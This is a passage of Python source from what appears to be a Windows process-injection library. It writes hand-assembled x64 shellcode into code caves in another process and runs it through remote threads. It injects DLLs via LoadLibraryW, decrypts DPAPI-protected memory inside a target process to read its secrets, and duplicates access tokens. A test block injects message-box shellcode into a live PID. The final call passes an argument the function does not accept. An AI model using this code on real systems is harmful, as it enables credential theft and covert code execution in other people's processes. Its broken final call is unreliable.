		#p2_addr = 0
		#p3_addr = 0
		#fnc_addr = 0

		#first_param
		p1 = b'\x48\xb9' + Process.int_to_asm(p1_addr) # MOVABS RCX,<ADDR>
		#second_param
		p2 = b'\x48\xba' + Process.int_to_asm(p2_addr) # MOVABS RDX,<ADDR>
		#third_param
		p3 = b'\x49\xb8' + Process.int_to_asm(p3_addr) # MOVABS R8,<ADDR>
		#load function address to RAX
		fnc = b'\x48\xb8' + Process.int_to_asm(fnc_addr) # MOVABS RAX,<ADDR>
		#CALL function address (in RAX)
		call_fnc = b'\xff\xd0' # CALL RAX

		exit_code_set = b'\x48\x89\xC1' # mov rcx, rax
		thread_exit_fnc = b'\x48\xb8' + Process.int_to_asm(exitthread_addr) # MOVABS RAX,<ADDR>
		#CALL function address (in RAX)
		call_thread_exit_fnc = b'\xff\xd0' # CALL RAX
		
		code = p3 + p2 + p1 + fnc + call_fnc + exit_code_set + thread_exit_fnc + call_thread_exit_fnc
		#print('code: %s' % code.hex())
		self.write(enclave, code)
		#input()

		thread_handle, thread_id = self.create_thread(enclave)
		#print(thread_handle)
		thread_exit = GetExitCodeThread(thread_handle)
		#print(thread_exit)

	def load_dll(self, dll_path):
		if dll_path[-1] != '\x00':
			dll_path += '\x00'

		loadlibrary_addr = self.get_remote_function_addr("Kernel32.dll", "LoadLibraryW")
		exitthread_addr = self.get_remote_function_addr("Kernel32.dll", "ExitThread")


		code_cave = self.page_alloc(2048)
		dllname_page = self.page_alloc(2048)
		self.write(dllname_page, dll_path.encode('utf-16-le'))

		code  = b''
		code += b'\x48\xb9' + Process.int_to_asm(dllname_page) # MOVABS RCX,<ADDR>
		code += b'\x48\xb8' + Process.int_to_asm(loadlibrary_addr) # MOVABS RAX,<ADDR>
		code += b'\xff\xd0' # CALL RAX
		code += b''
		code += b'\x48\x89\xC1' # mov rcx, rax
		code += b'\x48\xb8' + Process.int_to_asm(exitthread_addr) # MOVABS RAX,<ADDR>
		code += b'\xff\xd0' # CALL RAX
		
		self.write(code_cave, code)
		thread_handle, thread_id = self.create_thread(code_cave)
		WaitForSingleObject(thread_handle, 100) #waiting for the shellcode to finish...

		self.page_free(code_cave)


	def dpapi_memory_unprotect(self, protected_blob_addr, protected_blob_size, flags = 0):
		protected_blob_size = 16 * math.ceil(protected_blob_size/16)
		return self.dpapi_memory_unprotect_x64(protected_blob_addr, protected_blob_size, flags)

	def dpapi_memory_unprotect_x64(self, protected_blob_addr, protected_blob_size, flags = 0):
		# https://docs.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptunprotectmemory
		#CRYPTPROTECTMEMORY_SAME_PROCESS 0 
		#CRYPTPROTECTMEMORY_CROSS_PROCESS 1
		#CRYPTPROTECTMEMORY_SAME_LOGON 2

		
		#finding remote function addresses
		protectmemory_addr = self.get_remote_function_addr("Crypt32.dll", "CryptProtectMemory", True)
		unprotectmemory_addr = self.get_remote_function_addr("Crypt32.dll", "CryptUnprotectMemory", True)
		exitthread_addr = self.get_remote_function_addr("Kernel32.dll", "ExitThread")
		copymemory_addr = self.get_remote_function_addr("NtDll.dll", "RtlCopyMemory")
		#print('unprotectmemory_addr %s' % hex(unprotectmemory_addr))
		#print('exitthread_addr %s' % hex(exitthread_addr))
		#print('copymemory_addr %s' % hex(copymemory_addr))


		# allocating memory in remote process
		code_cave = self.page_alloc(1024)
		result_cave = self.page_alloc(protected_blob_size*10)
		#print('code_cave : %s' % hex(code_cave))
		#print('result_cave : %s' % hex(result_cave))


		#building code
		code  = b''
		code += b'\x48\xb9' + Process.int_to_asm(protected_blob_addr) # MOVABS RCX,<ADDR>
		code += b'\x48\xba' + Process.int_to_asm(protected_blob_size) # MOVABS RDX,<ADDR>
		code += b'\x49\xb8' + Process.int_to_asm(flags) # MOVABS R8,<ADDR>
		code += b'\x48\xb8' + Process.int_to_asm(unprotectmemory_addr) # MOVABS RAX,<ADDR>
		code += b'\xff\xd0' # CALL RAX
		code += b''
		code += b'\x48\xb9' + Process.int_to_asm(result_cave) # MOVABS RCX,<ADDR>
		code += b'\x48\xba' + Process.int_to_asm(protected_blob_addr) # MOVABS RDX,<ADDR>
		code += b'\x49\xb8' + Process.int_to_asm(protected_blob_size) # MOVABS R8,<ADDR>
		code += b'\x48\xb8' + Process.int_to_asm(copymemory_addr) # MOVABS RAX,<ADDR>
		code += b'\xff\xd0' # CALL RAX
		code += b''
		code += b'\x48\xb9' + Process.int_to_asm(protected_blob_addr) # MOVABS RCX,<ADDR>
		code += b'\x48\xba' + Process.int_to_asm(protected_blob_size) # MOVABS RDX,<ADDR>
		code += b'\x49\xb8' + Process.int_to_asm(flags) # MOVABS R8,<ADDR>
		code += b'\x48\xb8' + Process.int_to_asm(protectmemory_addr) # MOVABS RAX,<ADDR>
		code += b'\xff\xd0' # CALL RAX
		code += b''
		code += b'\x48\x89\xC1' # mov rcx, rax
		code += b'\x48\xb8' + Process.int_to_asm(exitthread_addr) # MOVABS RAX,<ADDR>
		code += b'\xff\xd0' # CALL RAX
		
	
		#print('code: %s' % code.hex())
		self.write(code_cave, code)

		thread_handle, thread_id = self.create_thread(code_cave)
		WaitForSingleObject(thread_handle, 100) #waiting for the shellcode to finish...
		thread_exit_code = GetExitCodeThread(thread_handle)
		#print(thread_exit_code)

		result = self.read(result_cave, protected_blob_size)

		self.page_free(code_cave)
		self.page_free(result_cave)
		return result
	
	def get_process_token(self, dwDesiredAccess = TOKEN_ALL_ACCESS):
		return OpenProcessToken(self.phandle, dwDesiredAccess)
	
	def duplicate_token(self, dwDesiredAccess = TOKEN_ALL_ACCESS, ImpersonationLevel = SecurityImpersonation, TokenType = 2):
		#proc_handle = self.api.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
		token_handle = OpenProcessToken(self.phandle, TOKEN_DUPLICATE)
		cloned_token = DuplicateTokenEx(
			token_handle, 
			dwDesiredAccess = dwDesiredAccess, 
			ImpersonationLevel = ImpersonationLevel, 
			TokenType = TokenType
		)
		CloseHandle(token_handle)
		return cloned_token
if __name__ == '__main__':
	calc = Process(pid=16236)
	calc.list_pages()
	calc.list_modules()
	print(1)
	"""
	

	data = calc.read(140705499119616, 0x100)
	print(data)
	new_addr = calc.page_alloc(0x1000)
	print(new_addr)
	data = calc.read(new_addr, 0x100)
	print(data)
	data = calc.write(new_addr, b'HELLO WORLD!')
	print(data)
	data = calc.read(new_addr, 0x100)
	print(data)
	x = calc.page_change_protect(new_addr, flags = PAGE_EXECUTE_READ)
	print(x)
	try:
		data = calc.write(new_addr, b'A'*20)
		print(data)
	except:
		print('Error but it is expected')
	calc.page_change_protect(new_addr)
	data = calc.write(new_addr, b'A'*20)
	print(data)
	data = calc.read(new_addr, 0x100)
	print(data)

	calc.page_free(new_addr)
	###################################################################################
	msgbox = b"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" +\
				b"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" + \
				b"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" + \
				b"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" +\
				b"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+\
				b"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+\
				b"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+\
				b"\x49\x0b\x31\xc0\x51\x50\xff\xd7"
	
	new_addr = calc.page_alloc(0x1000)
	print(hex(new_addr))
	data = calc.write(new_addr, msgbox)
	print(data)
	
	data = calc.read(new_addr, 0x100)
	print(data)

	calc.create_thread(new_addr)


	#calc.page_free(new_addr)
	"""
	#unprotectmemory_addr = calc.get_remote_function_addr("Crypt32.dll", "CryptUnprotectMemory")
	#print('unprotectmemory_addr %s' % hex(unprotectmemory_addr))
	#exitthread_addr = calc.get_remote_function_addr("Kernel32.dll", "ExitThread")
	#print('exitthread_addr %s' % hex(exitthread_addr))
	#copymemory_addr = calc.get_remote_function_addr("Kernel32.dll", "CopyMemory")
	#print('copymemory_addr %s' % hex(exitthread_addr))
	#cave = calc.page_alloc(0x1000)
	#print('enclave : %s' % hex(cave))
	#input()
	#calc.invoke_remote_function(cave, unprotectmemory_addr, 0x0000019DE0535440, 64, 0, exitthread_addr)
	calc.dpapi_memory_unprotect(0x0000027E24B918B0, 64, same_process = 0)

